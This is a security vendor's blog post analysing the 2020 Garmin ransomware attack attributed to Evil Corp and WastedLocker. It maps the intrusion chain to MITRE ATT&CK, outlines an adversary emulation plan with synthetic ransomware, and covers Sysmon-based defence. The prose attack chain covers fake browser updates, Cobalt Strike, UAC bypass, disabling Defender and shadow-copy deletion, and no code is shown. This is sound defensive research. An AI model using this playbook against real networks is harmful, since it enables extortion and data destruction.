Garmin users noticed their devices were not working on July 22, 2020, upon visiting the Garmin website, the below image was shown. It would not be until a week later that most Garmin services were operational again. As more information was made public, we found out the attack was attributed to a threat group known as Evil Corp and they leveraged a fairly new ransomware called WastedLocker. This blog post will dive deeper into the Garmin attack, extract TTPs from Cyber Threat Intelligence, create a MITRE ATT&CK Navigator Layer and adversary emulation plan, emulate the attack with Cobalt Strike (like Evil Corp used) and then drop a synthetic WastedLocker built with SCYTHE, and discuss how to defend against ransomware attacks with Olaf Hartong. This blog post is a summary of the DEF CON Red Team Village talk, slides available here and the video of the presentation is below.


    Cyber Threat Intelligence

    News of the Garmin attack started coming in on July 22, 2020. Eventually we learned all Garmin services were down for about a week:

    ‍


    We found, through Cyber Threat Intelligence, the group responsible for the attack is Evil Corp and they used a ransomware called WastedLocker. This group is not documented in the MITRE ATT&CK site so we had to review the below Cyber Threat Intelligence, extract the TTPs, and map it to MITRE ATT&CK:

    Evil Corp, as a threat group, is more sophisticated than the standard ransomware attack in that they manually interact with the target, move laterally through a number of systems, and then drop the ransomware. In this case, they dropped WastedLocker. At a high level, this is how the attack works:

    • SocGholish is delivered to the victim in a zipped file via compromised legitimate websites
    • Zip file with malicious JavaScript, masquerading as a browser update 
    • A second JavaScript file profiles the computer and uses PowerShell to download additional discovery related PowerShell scripts
    • Once the attackers gain network access, they use Cobalt Strike commodity malware with living-off-the-land tools to steal credentials, escalate privileges, and move across the network to deploy WastedLocker on multiple computers
    • PowerShell is used to download and execute a loader from a domain publicly reported as being used to deliver Cobalt Strike as part of WastedLocker attacks
    • An injected payload, known as Cobalt Strike Beacon, is used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files
    • Privilege escalation is performed using a publicly documented technique involving the Software Licensing User Interface tool, a command line utility responsible for activating and updating the Windows operating system
    • The attackers use the Windows Management Instrumentation Command Line Utility to execute commands on remote computers, such as adding a new user or execute additional downloaded PowerShell scripts
    • The attackers launch a legitimate command line tool for managing Windows Defender to disable scanning of all downloaded files and attachments, remove all installed definitions, and, in some cases, disable real-time monitoring
    • Windows Sysinternals tool PsExec is used to launch the WastedLocker ransomware, which then begins encrypting data and deleting shadow volumes

    Here is a screenshot of what the end user would see:

    https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/‍

    While the Cyber Threat Intelligence by NCC Group and Symantec has good detail, it is not mapped to MITRE ATT&CK so we did the mapping using ATT&CK Navigator and shared the JSON in the SCYTHE Community Threats Github. Here is a direct link to the Navigator Layer show below:

    Figure 1: Evil Corp with WastedLocker ATT&CK Navigator Layer

    Adversary Emulation Plan

    Is emulating ransomware even possible? Of course it is! The secret is to not encrypt or destroy production data. Instead create new files before emulating typical ransomware steps of encrypting, exfiltrating, and obtaining a ransom note. This method ensures no data is ever at risk of being encrypted, destroyed, or leaked.

    First, we start by creating by first building a threat profile for Evil Corp and WastedLocker:

     

    Tactic

    Description

    Initial Access

    T1189 - Drive-by Compromise

    Command and Control

    T1071 - Application Layer Protocol

    T1071.001 - Web Protocols

    T1573 - Encrypted Channel

    T1573.002 - Asymmetric Cryptography

    Execution

    T1059 - Command and Scripting Interpreter

    T1059.001 - PowerShell

    T1059.007 - JavaScript/JScript

    T1569 - System Services

    T1569.002 - Service Execution

    T1204 - User Execution

    T1204.002 - Malicious File

    T1047 - Windows Management Instrumentation

    Defense Evasion

    T1564 - Hide Artifacts

    T1564.004 - NTFS File Attributes

    T1562 - Impair Defenses

    T1562.001 - Disable or Modify Tools

    Discovery

    T1087 - Account Discovery

    T1087.001 - Local Account

    T1087.002 - Domain Account

    T1033 - System Owner/User Discovery

    Privilege Escalation

    T1548 - Abuse Elevation Control Mechanism

    T1548.002 - Bypass User Access Control

    Lateral Movement

    T1570 - Lateral Tool Transfer

    T1021.002 - SMB/Windows Admin Shares

    Impact

    T1485 - Data Destruction

    T1486 - Data Encrypted for Impact

    T1565 - Data Manipulation

    T1565.001 - Stored Data Manipulation

    T1490 - Inhibit System Recovery

    T1489 - Service Stop

    ‍
    Given Evil Corp used Cobalt Strike for manual, lateral movement, we demo how to get a Cobalt Strike Beacon using PowerShell, just as Evil Corp did. Then we use Cobalt Strike to drop the WastedLocker ransomware we created with SCYTHE. The synthetic malware is available on our Community Threats Github for Evil Corp and was created with the below steps:

    Defend against WastedLocker

    We had the pleasure of sitting down with industry thought leader and just awarded Microsoft MVP, Olaf Hartong, to discuss how to defend against ransomware attacks. Given there are many strains of ransomware in the wild, it is important to focus on the behaviors that ransomware has shown in the past and continue to monitor as these criminal gangs evolve. 

    Olaf gives us an introduction to Sysmon, a Windows system service and device driver that monitors and logs system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.

    Conclusion

    Ransomware is evolving and getting more sophisticated. Evil Corp uses a number of tools to gain initial access, manually move laterally around the target environment, and then drop the ransomware. In this post, we consumed the Cyber Threat Intelligence as it came out, extracts TTPs, mapped to MITRE ATT&CK and created a Navigator Layer, created an adversary emulation plan and shared it on our GitHub, demoed the emulation, and discussed defending against ransomware with Olag Hartong. We hope you enjoyed this blog post that is a summary of the DEF CON Red Team Village talk, slides available here.

    This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided β€œas-is” without any warranty or condition of any kind, either express or implied.

    About SCYTHE

    SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io


    Jorge Orchilles
    Post by Jorge Orchilles
    August 6, 2020

    Comments